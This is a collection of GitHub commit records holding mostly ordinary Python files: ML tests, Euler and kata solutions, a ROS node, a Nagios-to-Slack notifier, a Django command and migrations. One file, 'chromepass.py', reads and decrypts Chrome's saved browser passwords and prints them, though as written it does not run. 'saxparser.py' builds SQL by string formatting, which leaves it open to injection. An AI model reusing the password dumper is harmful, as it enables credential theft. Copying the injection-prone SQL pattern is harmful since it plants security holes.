type_hints=dict(iris=DiscreteVariable(
values=['Iris-setosa', 'Iris-versicolor',
'Iris-virginica']),
__class_vars__=['iris']))
table = DiscretizeTable(table)
bayes = nb.BayesLearner()
clf = bayes(table)
# Single instance prediction
self.assertEqual(clf(table[0]), table[0].get_class())
# Table prediction
pred = clf(table)
actual = array([ins.get_class() for ins in table])
ca = pred == actual
ca = ca.sum() / len(ca)
self.assertGreater(ca, 0.95)
self.assertLess(ca, 1.)
| bsd-2-clause | Python |
|
78f89e96adedd1045f900d5f9f95c3eb35c12ca3 | Create routine module with Tool class | BakeCode/performance-testing,BakeCode/performance-testing | performance/routine.py | performance/routine.py |
class Tool:
def __init__(self, config):
pass
| mit | Python |
|
6c0aab6c14539b1cd4eedcd1280bcc4eb35ff7ea | Create poly_talker.py | Shad0wSt4R/poly_crier | poly_talker.py | poly_talker.py | #! /usr/bin/env python
import rospy
from std_msgs.msg import String
from random import randint
def talker():
# List of names to be printed
words = ["Dr. Bushey", "Vamsi", "Jon"]
# Registers with roscore a node called "talker".
# ROS programs are called nodes.
rospy.init_node('talker')
# Publisher object gets registered to roscore and creates a topic.
pub = rospy.Publisher('names', String)
# How fast names will be posted. In Hertz.
rate = rospy.Rate(21)
while not rospy.is_shutdown():
number = randint(0,2)
pub.publish(words[number])
rate.sleep()
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass
| mit | Python |
|
7b3753428f04c86b95191e76ca2c50b54577411a | add problem 27 | smrmkt/project_euler | problem_027.py | problem_027.py | #!/usr/bin/env python
#-*-coding:utf-8-*-
'''
Euler discovered the remarkable quadratic formula:
n² + n + 41
It turns out that the formula will produce 40 primes for
the consecutive values n = 0 to 39.
However, when n = 40, 402 + 40 + 41 = 40(40 + 1) + 41 is
divisible by 41, and certainly when n = 41, 41² + 41 + 41 is
clearly divisible by 41.
The incredible formula n² − 79n + 1601 was discovered,
which produces 80 primes for the consecutive values n = 0 to 79.
The product of the coefficients, −79 and 1601, is −126479.
Considering quadratics of the form:
n² + an + b, where |a| < 1000 and |b| < 1000
where |n| is the modulus/absolute value of n
e.g. |11| = 11 and |−4| = 4
Find the product of the coefficients, a and b,
for the quadratic expression that produces the maximum number of
primes for consecutive values of n, starting with n = 0.
'''
import math
import timeit
def loop(i):
(ma, mb, mn) = (0, 0, 0)
primes = [j for j in range(-i+1, i) if is_prime(abs(j))]
for a in primes:
for b in primes:
n = 0
while is_prime(n**2+a*n+b):
n += 1
(ma, mb, mn) = (a, b, n) if mn < n else (ma, mb, mn)
return ma, mb, mn, ma*mb
def is_prime(n):
if n < 2:
return False
for i in range(2, int(math.sqrt(n))+1):
if n % i == 0:
return False
return True
if __name__ == '__main__':
print loop(1000)
print timeit.Timer('problem_027.loop(1000)', 'import problem_027').timeit(1) | mit | Python |
|
f530fb3ebe5639d7d6dfe013c5abc70769009a04 | add script | malaterre/dicom-private-dicts,malaterre/dicom-private-dicts,malaterre/dicom-private-dicts | collapse.py | collapse.py | #!/usr/bin/env python
import json
import sys
import argparse
import xmldict
f='bla.json'
ref=2
out=[]
with open(f) as data_file:
pages = json.load(data_file)
for page in pages:
data = page['data']
lineIter = iter(data)
oldline = None
for line in lineIter:
ref_line = line[ref]['text']
if not ref_line:
#print "bla"
if oldline:
for cellold,cellnew in zip(oldline,line):
cellold['text'] = ' '.join( [cellold['text'] , cellnew['text']]).rstrip()
else:
if oldline:
out.append( oldline )
oldline = line
#print out
print json.dumps(out, sort_keys=True, indent=4)
#for line in data:
# print line[ref]['text']
# #for cell in line:
# # print cell['text']
# #print line['text']
| bsd-3-clause | Python |
|
e9451a8b2d196353e393d265482e37faa651eb1e | Tue Nov 4 20:46:16 PKT 2014 Init | hassaanaliw/chromepass | chromepass.py | chromepass.py | from os import getenv
import sqlite3
import win32crypt
appdata = getenv("APPDATA")
connection = sqlite3.connect(appdata + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
pass = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if pass:
print 'website_link ' + information[0]
print 'Username: ' + information[1]
print 'Password: ' + password
| mit | Python |
|
0c38c72ef0bc337677f80f0b087ffa374f211e37 | Create saxparser.py | RDBinns/datactrl | saxparser.py | saxparser.py | #!/usr/bin/python
import sys
import xml.sax
import io
import MySQLdb
class MyHandler(xml.sax.ContentHandler):
def __init__(self):
xml.sax.ContentHandler.__init__(self)
self.db = MySQLdb.connect(host="localhost", user="root", passwd="", db="registerdb2011")
self.cursor = self.db.cursor()
self.buffer = []
self.ctrlId = 0
self.purposeId = 0
def getCharacters(self):
data = ''.join(self.buffer).strip()
self.buffer = []
return data.strip()
def characters(self, name):
self.buffer.append(name)
def endElement(self, name):
data = self.getCharacters()
if name == "DATA_CTLR_NAME":
self.ctrlId = self.ctrlId +1
self.insertDatactrl(data)
elif name == "OTHER_NAME":
self.insertOthername(data)
elif name == "PURPOSE" and data != "":
self.purposeId = self.purposeId +1
self.insertPurpose(data)
elif name == "PURPOSE_TEXT":
self.insertPurposeOthername(data)
elif name == "CLASS":
self.insertPurposeClass(data)
elif name == "RECIPIENT":
self.insertPurposeRecipient(data)
elif name == "TRANSFER":
self.insertPurposeTransfer(data)
elif name == "SUBJECT":
self.insertPurposeSubject(data)
def insertDatactrl(self, data):
self.cursor.execute('insert into datactrl(datactrl_id, datactrl_name) values("%s", "%s")' % (self.ctrlId, data))
self.db.commit()
sys.stdout.write("inserted datactrl %s %s\n" % (self.ctrlId, data))
def insertOthername(self, data):
self.cursor.execute('insert into datactrl_othernames(datactrl_id, othername) values("%s", "%s")' % (self.ctrlId, data))
def insertPurpose(self, data):
self.cursor.execute('insert into purpose(purpose_id, datactrl_id, purpose_name) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeClass(self, data):
self.cursor.execute('insert into purpose_classes(purpose_id, datactrl_id, class) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeOthername(self, data):
self.cursor.execute('insert into purpose_othernames(purpose_id, datactrl_id, othername) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeRecipient(self, data):
self.cursor.execute('insert into purpose_recipients(purpose_id, datactrl_id, recipient) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeSubject(self, data):
self.cursor.execute('insert into purpose_subjects(purpose_id, datactrl_id, subject) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeTransfer(self, data):
self.cursor.execute('insert into purpose_transfers(purpose_id, datactrl_id, transfer) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
handler = MyHandler()
stream = io.open("register_31072011.xml", "r")
xml.sax.parse(stream, handler)
| apache-2.0 | Python |
|
cf9b6b477e6d044e4065086f98906a0eb4504ff3 | Add slack_nagios script | al4/python-slack_nagios | slack_nagios.py | slack_nagios.py | #!/bin/python
import argparse
import requests
"""
A simple script to post nagios notifications to slack
Similar to https://raw.github.com/tinyspeck/services-examples/master/nagios.pl
But adds proxy support
Note: If your internal proxy only exposes an http interface, you will need to be running a modern version of urllib3.
See https://github.com/kennethreitz/requests/issues/1359
Designed to work as such:
slack_nagios.py -field slack_channel=#alerts -field HOSTALIAS="$HOSTNAME$" -field SERVICEDESC="$SERVICEDESC$" -field SERVICESTATE="$SERVICESTATE$" -field SERVICEOUTPUT="$SERVICEOUTPUT$" -field NOTIFICATIONTYPE="$NOTIFICATIONTYPE$"
slack_nagios.py -field slack_channel=#alerts -field HOSTALIAS="$HOSTNAME$" -field HOSTSTATE="$HOSTSTATE$" -field HOSTOUTPUT="$HOSTOUTPUT$" -field NOTIFICATIONTYPE="$NOTIFICATIONTYPE$"
"""
def send_alert(args):
if args.proxy:
proxy = {
"http": args.proxy,
"https": args.proxy
}
else:
proxy = {}
url = "https://{d}/services/hooks/nagios?token={t}".format(
d=args.domain,
t=args.token
)
payload = {
'slack_channel': "#" + args.channel
}
for field in args.field:
key, value = field[0].split('=')
payload[key] = value
req = requests.post(url=url, proxies=proxy, data=payload)
if args.debug:
print(req.text)
print(req.status_code)
return req
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Post nagios notifications to slack")
parser.add_argument('--debug', help="Debug mode", action='store_true')
parser.add_argument('--proxy', '-p', help="Proxy to use, full url format", default=None)
parser.add_argument('--domain', '-d', help="Slack domain to post to", required=True)
parser.add_argument('--channel', '-c', help="Channel to post to", required=True)
parser.add_argument('--token', '-t', help="Auth token", required=True)
parser.add_argument('-field', nargs='*', required=True, action='append',
help="Alert fields (Should be specified more than once)")
args = parser.parse_args()
send_alert(args)
| mit | Python |
|
f437b7875aa4bed06dcf3884bb81c009b7e473f0 | Add 290-word-pattern.py | mvj3/leetcode | 290-word-pattern.py | 290-word-pattern.py | """
Question:
Word Pattern
Given a pattern and a string str, find if str follows the same pattern.
Examples:
pattern = "abba", str = "dog cat cat dog" should return true.
pattern = "abba", str = "dog cat cat fish" should return false.
pattern = "aaaa", str = "dog cat cat dog" should return false.
pattern = "abba", str = "dog dog dog dog" should return false.
Notes:
Both pattern and str contains only lowercase alphabetical letters.
Both pattern and str do not have leading or trailing spaces.
Each word in str is separated by a single space.
Each letter in pattern must map to a word with length that is at least 1.
Credits:
Special thanks to @minglotus6 for adding this problem and creating all test cases.
Performance:
1. Total Accepted: 1839 Total Submissions: 6536 Difficulty: Easy
2. Sorry. We do not have enough accepted submissions.
"""
class Solution(object):
def wordPattern(self, pattern, str):
"""
:type pattern: str
:type str: str
:rtype: bool
"""
patterns = list(pattern)
words = str.split(" ")
if len(patterns) != len(words):
return False
short_to_long = dict()
seen_longs = set([])
for idx, short in enumerate(patterns):
long = words[idx]
if short not in short_to_long:
if long in seen_longs:
return False
short_to_long[short] = long
seen_longs.add(long)
else:
if short_to_long[short] != long:
return False
return True
assert Solution().wordPattern("abba", "dog cat cat dog") is True
assert Solution().wordPattern("abba", "dog cat cat fish") is False
assert Solution().wordPattern("aaaa", "dog cat cat dog") is False
assert Solution().wordPattern("abba", "dog dog dog dog") is False
| mit | Python |
|
f39a640a8d5bf7d4a5d80f94235d1fa7461bd4dc | Add code for stashing a single nuxeo image on s3. | barbarahui/nuxeo-calisphere,barbarahui/nuxeo-calisphere | s3stash/stash_single_image.py | s3stash/stash_single_image.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os
import argparse
import logging
import json
from s3stash.nxstashref_image import NuxeoStashImage
def main(argv=None):
parser = argparse.ArgumentParser(description='Produce jp2 version of Nuxeo image file and stash in S3.')
parser.add_argument('path', help="Nuxeo document path")
parser.add_argument('--bucket', default='ucldc-private-files/jp2000', help="S3 bucket name")
parser.add_argument('--region', default='us-west-2', help='AWS region')
parser.add_argument('--pynuxrc', default='~/.pynuxrc', help="rc file for use by pynux")
parser.add_argument('--replace', action="store_true", help="replace file on s3 if it already exists")
if argv is None:
argv = parser.parse_args()
# logging
# FIXME would like to name log with nuxeo UID
filename = argv.path.split('/')[-1]
logfile = "logs/{}.log".format(filename)
print "LOG:\t{}".format(logfile)
logging.basicConfig(filename=logfile, level=logging.INFO, format='%(asctime)s (%(name)s) [%(levelname)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logger = logging.getLogger(__name__)
# convert and stash jp2
nxstash = NuxeoStashImage(argv.path, argv.bucket, argv.region, argv.pynuxrc, argv.replace)
report = nxstash.nxstashref()
# output report to json file
reportfile = "reports/{}.json".format(filename)
with open(reportfile, 'w') as f:
json.dump(report, f, sort_keys=True, indent=4)
# parse report to give basic stats
print "REPORT:\t{}".format(reportfile)
print "SUMMARY:"
if 'already_s3_stashed' in report.keys():
print "already stashed:\t{}".format(report['already_s3_stashed'])
print "converted:\t{}".format(report['converted'])
print "stashed:\t{}".format(report['stashed'])
print "\nDone."
if __name__ == "__main__":
sys.exit(main())
| bsd-3-clause | Python |
|
12821e2859151e8f949f55b8c363ff95d296a7d0 | add setup.py for python interface | mhdella/libsvm,cypro666/libsvm,dejon97/libsvm,asifmadnan/libsvm,phoenixstar7/libsvm,androidYibo/libsvm,DaveGeneral/libsvm,Adoni/libsvm,cjlin1/libsvm,mhdella/libsvm,Guokr1991/libsvm,ntucllab/hintsvm,sdgdsffdsfff/libsvm,G-P-S/libsvm,phoenixstar7/libsvm,asifmadnan/libsvm,sdgdsffdsfff/libsvm,androidYibo/libsvm,ntucllab/hintsvm,DaveGeneral/libsvm,G-P-S/libsvm,cypro666/libsvm,ntucllab/hintsvm,phoenixstar7/libsvm,caidongyun/libsvm,DaveGeneral/libsvm,dejon97/libsvm,dejon97/libsvm,asifmadnan/libsvm,Guokr1991/libsvm,G-P-S/libsvm,Guokr1991/libsvm,asifmadnan/libsvm,ntucllab/hintsvm,cypro666/libsvm,TKlerx/libsvm,mvtuong/Yelp-Challenge,toothacher17/libsvm,TKlerx/libsvm,mvtuong/Yelp-Challenge,melissa-mccoy/libsvm,phoenixstar7/libsvm,dejon97/libsvm,androidYibo/libsvm,dejon97/libsvm,TKlerx/libsvm,sdgdsffdsfff/libsvm,cypro666/libsvm,ntucllab/hintsvm,Guokr1991/libsvm,mvtuong/Yelp-Challenge,toothacher17/libsvm,sdgdsffdsfff/libsvm,mhdella/libsvm,ChinaQuants/libsvm,melissa-mccoy/libsvm,toothacher17/libsvm,mhdella/libsvm,phoenixstar7/libsvm,mhdella/libsvm,Adoni/libsvm,phoenixstar7/libsvm,Maluuba/libsvm,Maluuba/libsvm,androidYibo/libsvm,cypro666/libsvm,androidYibo/libsvm,melissa-mccoy/libsvm,DaveGeneral/libsvm,G-P-S/libsvm,TKlerx/libsvm,ChinaQuants/libsvm,mvtuong/Yelp-Challenge,ChinaQuants/libsvm,asifmadnan/libsvm,toothacher17/libsvm,caidongyun/libsvm,G-P-S/libsvm,cjlin1/libsvm,Guokr1991/libsvm,Maluuba/libsvm,cjlin1/libsvm,melissa-mccoy/libsvm,asifmadnan/libsvm,Maluuba/libsvm,Adoni/libsvm,DaveGeneral/libsvm,caidongyun/libsvm,toothacher17/libsvm,melissa-mccoy/libsvm,ChinaQuants/libsvm,caidongyun/libsvm,Adoni/libsvm,sdgdsffdsfff/libsvm,dejon97/libsvm,toothacher17/libsvm,melissa-mccoy/libsvm,ChinaQuants/libsvm,androidYibo/libsvm,TKlerx/libsvm,G-P-S/libsvm,TKlerx/libsvm,mhdella/libsvm,ChinaQuants/libsvm,ntucllab/hintsvm,cjlin1/libsvm,caidongyun/libsvm,cjlin1/libsvm,Guokr1991/libsvm,cypro666/libsvm,cjlin1/libsvm,sdgdsffdsfff/libsvm,Maluuba/libsvm,caidongyun/libsvm,DaveGeneral/libsvm,Maluuba/libsvm | python/setup.py | python/setup.py | #!/usr/bin/env python
from distutils.core import setup, Extension
setup(name = "LIBSVM",
version = "2.87",
author="Chih-Chung Chang and Chih-Jen Lin",
maintainer="Chih-Jen Lin",
maintainer_email="[email protected]",
url="http://www.csie.ntu.edu.tw/~cjlin/libsvm/",
description = "LIBSVM Python Interface",
ext_modules = [Extension("svmc",
["../svm.cpp", "svmc_wrap.c"],
extra_compile_args=["-O3", "-I../"]
)
],
py_modules=["svm"],
)
| bsd-3-clause | Python |
|
794b8c32dd0c5bd45bb580a75f6f4da63b689eb6 | Add `find_contentitem_urls` management command to index URL usage | django-fluent/django-fluent-contents,edoburu/django-fluent-contents,edoburu/django-fluent-contents,django-fluent/django-fluent-contents,django-fluent/django-fluent-contents,edoburu/django-fluent-contents | fluent_contents/management/commands/find_contentitem_urls.py | fluent_contents/management/commands/find_contentitem_urls.py | import operator
from functools import reduce
import sys
from django.core.management.base import BaseCommand
from django.db import models
from django.db.models import Q
from django.utils.encoding import force_text
from django.utils import six
from fluent_contents.extensions import PluginHtmlField, PluginImageField, PluginUrlField
from fluent_contents.extensions import plugin_pool
from html5lib import treebuilders, HTMLParser
class Command(BaseCommand):
"""
Add a prefix to the name of content items.
This makes content items easier to spot in the permissions list.
"""
help = "Find all link and image URLs in all content items."
def handle(self, *args, **options):
self.verbosity = options['verbosity']
urls = []
# Look through all registered models.
for model in plugin_pool.get_model_classes():
urls += self.inspect_model(model)
self.stdout.write("")
for urls in sorted(set(urls)):
self.stdout.write(urls)
def inspect_model(self, model):
"""
Inspect a single model
"""
# See which interesting fields the model holds.
url_fields = sorted(f for f in model._meta.fields if isinstance(f, (PluginUrlField, models.URLField)))
picture_fields = sorted(f for f in model._meta.fields if isinstance(f, (PluginImageField, models.ImageField)))
html_fields = sorted(f for f in model._meta.fields if isinstance(f, PluginHtmlField))
if not picture_fields and not html_fields and not url_fields:
return []
all_fields = [f.name for f in (picture_fields + html_fields + url_fields)]
sys.stderr.write("Inspecting {0} ({1})\n".format(model.__name__, ", ".join(all_fields)))
q_notnull = reduce(operator.or_, (Q(**{"{0}__isnull".format(f): False}) for f in all_fields))
qs = model.objects.filter(q_notnull).order_by('pk')
urls = []
for contentitem in qs:
# HTML fields need proper html5lib parsing
for field in html_fields:
value = getattr(contentitem, field.name)
if value:
html_images = self.extract_html_urls(value)
for image in html_images:
self.show_match(contentitem, image)
urls += html_images
# Picture fields take the URL from the storage class.
for field in picture_fields:
value = getattr(contentitem, field.name)
if value:
self.show_match(contentitem, value)
urls.append(force_text(value.url))
# URL fields can be read directly.
for field in url_fields:
value = getattr(contentitem, field.name)
if isinstance(value, six.text_type):
urls.append(value)
else:
urls.append(value.to_db_value()) # AnyUrlValue
return urls
def show_match(self, contentitem, value):
if self.verbosity >= 2:
self.stdout.write("{0}#{1}: \t{2}".format(contentitem.__class__.__name__, contentitem.pk, value))
def extract_html_urls(self, html):
"""
Take all ``<img src="..">`` from the HTML
"""
p = HTMLParser(tree=treebuilders.getTreeBuilder("dom"))
dom = p.parse(html)
urls = []
for img in dom.getElementsByTagName('img'):
src = img.getAttribute('src')
if src:
urls.append(src)
srcset = img.getAttribute('srcset')
if srcset:
urls += self.extract_srcset(srcset)
for source in dom.getElementsByTagName('source'):
srcset = source.getAttribute('srcset')
if srcset:
urls += self.extract_srcset(srcset)
for source in dom.getElementsByTagName('a'):
href = source.getAttribute('href')
if href:
urls.append(href)
return urls
def extract_srcset(self, srcset):
"""
Handle ``srcset="image.png 1x, [email protected] 2x"``
"""
urls = []
for item in srcset.split(','):
if item:
urls.append(item.rsplit(' ', 1)[0])
return urls
| apache-2.0 | Python |
|
fc911a4952a46ea372e1a42cff78351b4f8b42ef | complete 15 lattice paths | dawran6/project-euler | 15-lattice-paths.py | 15-lattice-paths.py | from collections import defaultdict
from math import factorial as fac
if __name__ == '__main__':
# Dynamic programming method
paths = defaultdict(dict)
for i in range(21):
paths[0][i] = 1
paths[i][0] = 1
for i in range(1, 21):
for j in range(1, 21):
paths[i][j] = paths[i-1][j] + paths[i][j-1]
print(paths[20][20])
# Pure math
print(fac(40)//fac(20)//fac(20))
| mit | Python |
|
684387315025bc7789aa75def757894cb8d92154 | add quickie Python JSON-filtering script | tidepool-org/tideline,tidepool-org/tideline | dev/filter_json.py | dev/filter_json.py | # == BSD2 LICENSE ==
# Copyright (c) 2014, Tidepool Project
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the associated License, which is identical to the BSD 2-Clause
# License as published by the Open Source Initiative at opensource.org.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the License for more details.
#
# You should have received a copy of the License along with this program; if
# not, you can obtain one from Tidepool Project at tidepool.org.
# == BSD2 LICENSE ==
# Usage:
# python filter_json.py <path/to/JSON/file> <filter> <optional/path/to/output/file>
import json
import sys
def main():
o = open(sys.argv[1], 'rU')
try:
output_file = open(sys.argv[3], 'w')
except IndexError:
output_file = open('filter-output.json', 'w')
jsn = json.load(o)
filtered = []
for obj in jsn:
if obj['type'] == sys.argv[2]:
filtered.append(obj)
print >> output_file, json.dumps(filtered, separators=(',',': '), indent=4)
if __name__ == '__main__':
main() | bsd-2-clause | Python |
|
7d20f9bcbfda514c216fb7faaa08325f21c0e119 | add 01 code | xiaxiaoyu1988/leetcode,xiaxiaoyu1988/leetcode | 01-two-snum.py | 01-two-snum.py | class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
for i in range(len(nums)):
last = nums[i]
# print last
for j, num in enumerate(nums[i+1:]):
# print j, num
if last + num == target:
return [i,i+1+j]
| mit | Python |
|
b699a18f8928a6e859ebc34a843e4c8a64a22b26 | add script to grid-search model parameters — script from scikit-learn: http://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html#sklearn.model_selection.GridSearchCV | juanmirocks/LocText,juanmirocks/LocText,Rostlab/LocText,juanmirocks/LocText,Rostlab/LocText,Rostlab/LocText | scripts/grid_search_digits.py | scripts/grid_search_digits.py | """
============================================================
Parameter estimation using grid search with cross-validation
============================================================
This examples shows how a classifier is optimized by cross-validation,
which is done using the :class:`sklearn.model_selection.GridSearchCV` object
on a development set that comprises only half of the available labeled data.
The performance of the selected hyper-parameters and trained model is
then measured on a dedicated evaluation set that was not used during
the model selection step.
More details on tools available for model selection can be found in the
sections on :ref:`cross_validation` and :ref:`grid_search`.
"""
from __future__ import print_function
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import classification_report
from sklearn.svm import SVC
print(__doc__)
# Loading the Digits dataset
digits = datasets.load_digits()
# To apply an classifier on this data, we need to flatten the image, to
# turn the data in a (samples, feature) matrix:
n_samples = len(digits.images)
X = digits.images.reshape((n_samples, -1))
y = digits.target
# Split the dataset in two equal parts
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.5, random_state=0)
# Set the parameters by cross-validation
tuned_parameters = [{'kernel': ['rbf'], 'gamma': [1e-3, 1e-4],
'C': [1, 10, 100, 1000]},
{'kernel': ['linear'], 'C': [1, 10, 100, 1000]}]
scores = ['precision', 'recall']
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
print()
clf = GridSearchCV(SVC(C=1), tuned_parameters, cv=5,
scoring='%s_macro' % score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set:")
print()
print(clf.best_params_)
print()
print("Grid scores on development set:")
print()
means = clf.cv_results_['mean_test_score']
stds = clf.cv_results_['std_test_score']
for mean, std, params in zip(means, stds, clf.cv_results_['params']):
print("%0.3f (+/-%0.03f) for %r"
% (mean, std * 2, params))
print()
print("Detailed classification report:")
print()
print("The model is trained on the full development set.")
print("The scores are computed on the full evaluation set.")
print()
y_true, y_pred = y_test, clf.predict(X_test)
print(classification_report(y_true, y_pred))
print()
# Note the problem is too easy: the hyperparameter plateau is too flat and the
# output model is the same for precision and recall with ties in quality.
| apache-2.0 | Python |
|
3c2316b69fcee9db820937c2814a9872e27f95a9 | Implement frequent direction sketch | hido/frequent-direction | fd_sketch.py | fd_sketch.py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
import numpy as np
import numpy.linalg as ln
import math
import sys
""" This is a simple and deterministic method for matrix sketch.
The original method has been introduced in [Liberty2013]_ .
[Liberty2013] Edo Liberty, "Simple and Deterministic Matrix Sketching", ACM SIGKDD, 2013.
"""
def sketch(mat_a, ell):
"""Compute a sketch matrix of input matrix
Note that \ell must be smaller than m * 2
:param mat_a: original matrix to be sketched (n x m)
:param ell: the number of rows in sketch matrix
:returns: sketch matrix (\ell x m)
"""
# number of columns
m = mat_a.shape[1]
# Input error handling
if math.floor(ell / 2) >= m:
raise ValueError('Error: ell must be smaller than m * 2')
if ell >= mat_a.shape[0]:
raise ValueError('Error: ell must not be greater than n')
# initialize output matrix B
mat_b = np.zeros([ell, m])
# compute zero valued row list
zero_rows = np.nonzero([round(s, 7) == 0.0 for s in np.sum(mat_b, axis = 1)])[0].tolist()
# repeat inserting each row of matrix A
for i in range(0, mat_a.shape[0]):
# insert a row into matrix B
mat_b[zero_rows[0], :] = mat_a[i, :]
# remove zero valued row from the list
zero_rows.remove(zero_rows[0])
# if there is no more zero valued row
if len(zero_rows) == 0:
# compute SVD of matrix B
mat_u, vec_sigma, mat_v = ln.svd(mat_b, full_matrices=False)
# obtain squared singular value for threshold
squared_sv_center = vec_sigma[math.floor(ell / 2)] ** 2
# update sigma to shrink the row norms
sigma_tilda = [(0.0 if d < 0.0 else math.sqrt(d)) for d in (vec_sigma ** 2 - squared_sv_center)]
# update matrix B where at least half rows are all zero
mat_b = np.dot(np.diagflat(sigma_tilda), mat_v)
# update the zero valued row list
zero_rows = np.nonzero([round(s, 7) == 0 for s in np.sum(mat_b, axis = 1)])[0].tolist()
return mat_b
def calculateError(mat_a, mat_b):
"""Compute the degree of error by sketching
:param mat_a: original matrix
:param mat_b: sketch matrix
:returns: reconstruction error
"""
dot_mat_a = np.dot(mat_a.T, mat_a)
dot_mat_b = np.dot(mat_b.T, mat_b)
return ln.norm(dot_mat_a - dot_mat_b, ord = 2)
def squaredFrobeniusNorm(mat_a):
"""Compute the squared Frobenius norm of a matrix
:param mat_a: original matrix
:returns: squared Frobenius norm
"""
return ln.norm(mat_a, ord = 'fro') ** 2
| bsd-2-clause | Python |
|
fe86df913b79fdf8c3627fe31b87c6dfa3da4f46 | implement QEngine | rajpurkar/chess-deep-rl | engines/QEngine.py | engines/QEngine.py | #!/usr/bin/env python3
from ChessEngine import ChessEngine
import chess
import sys
sys.path.append('.')
import data
class QEngine(ChessEngine):
def __init__(self, picklefile):
super().__init__()
with open(picklefile, "rb") as f:
self.Q = pickle.load(Q, f)
def search(self):
s = data.state_from_board(board, hashable=True)
try:
a = Q[s]
from_square = a // NUM_SQUARES
to_square = a % NUM_SQUARES
move = chess.Move(from_square, to_square)
except:
moves = list(self.board.generate_legal_moves())
move = random.choice(moves)
self.moves = [move]
if __name__ == "__main__":
engine = QEngine("engines/sarsa_Q_-_.pickle")
engine.run()
| mit | Python |
|
e782e519012c4734f591388114fc954fdc014acf | add thousands_separator in Python to format folder | daltonmenezes/learning-C | src/Python/format/thousands_separator.py | src/Python/format/thousands_separator.py | #!/usr/bin/env python
print " Formated number:", "{:,}".format(102403)
| mit | Python |
|
3e8c18b32058d9d33ae0d12744355bb65c2b96ed | add alembic migration for orders table | wuvt/wuvt-site,wuvt/wuvt-site,wuvt/wuvt-site,wuvt/wuvt-site | migrations/versions/187cf9175cee_add_orders_table.py | migrations/versions/187cf9175cee_add_orders_table.py | """add orders table
Revision ID: 187cf9175cee
Revises: 3d8cf74c2de4
Create Date: 2015-10-23 23:43:31.769594
"""
# revision identifiers, used by Alembic.
revision = '187cf9175cee'
down_revision = '3d8cf74c2de4'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('orders',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.Unicode(length=255), nullable=True),
sa.Column('email', sa.Unicode(length=255), nullable=True),
sa.Column('phone', sa.Unicode(length=12), nullable=True),
sa.Column('placed_date', sa.DateTime(), nullable=True),
sa.Column('dj', sa.UnicodeText(), nullable=True),
sa.Column('thank_on_air', sa.Boolean(), nullable=True),
sa.Column('first_time', sa.Boolean(), nullable=True),
sa.Column('premiums', sa.Unicode(length=255), nullable=True),
sa.Column('address1', sa.Unicode(length=255), nullable=True),
sa.Column('address2', sa.Unicode(length=255), nullable=True),
sa.Column('city', sa.Unicode(length=255), nullable=True),
sa.Column('state', sa.Unicode(length=255), nullable=True),
sa.Column('zipcode', sa.Integer(), nullable=True),
sa.Column('amount', sa.Integer(), nullable=True),
sa.Column('recurring', sa.Boolean(), nullable=True),
sa.Column('paid_date', sa.DateTime(), nullable=True),
sa.Column('shipped_date', sa.DateTime(), nullable=True),
sa.Column('tshirtsize', sa.Unicode(length=255), nullable=True),
sa.Column('tshirtcolor', sa.Unicode(length=255), nullable=True),
sa.Column('sweatshirtsize', sa.Unicode(length=255), nullable=True),
sa.Column('method', sa.Unicode(length=255), nullable=True),
sa.Column('custid', sa.Unicode(length=255), nullable=True),
sa.Column('comments', sa.UnicodeText(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('orders')
### end Alembic commands ###
| agpl-3.0 | Python |
|
64dede2c9a3d489eb8c93200ea8788c26db6da31 | Create 6kyu_divisor_harmony.py | Orange9000/Codewars,Orange9000/Codewars | Solutions/6kyu/6kyu_divisor_harmony.py | Solutions/6kyu/6kyu_divisor_harmony.py | def solve(a,b):
pairs={}
for i in range(a,b):
ratio=div_sum(i)/i
try: pairs[ratio]=pairs[ratio]+[i]
except: pairs[ratio]=[i]
return sum(min(i) for i in pairs.values() if len(i)>=2)
def div_sum(n):
return sum(i for i in range(1,n+1) if n%i==0)
| mit | Python |
|
de7b7d10e5776d631c15660255cf8ad2b85f3d25 | Create Beginner 10-A.py | unasuke/AtCoder,unasuke/AtCoder,unasuke/AtCoder | Beginner/10/10-A.py | Beginner/10/10-A.py | #AtCoder Beginner 10 A
name = raw_input()
print name + "pp"
| mit | Python |
|
d65e9246256709f2cec0fa863515cca0dc4acb0b | add config for sphinx documentation | LILiK-117bis/lilik_playbook,LILiK-117bis/lilik_playbook,LILiK-117bis/lilik_playbook | doc/source/conf.py | doc/source/conf.py | # -*- coding: utf-8 -*-
#
# lilik_playbook documentation build configuration file, created by
# sphinx-quickstart on Fri Apr 7 14:02:37 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
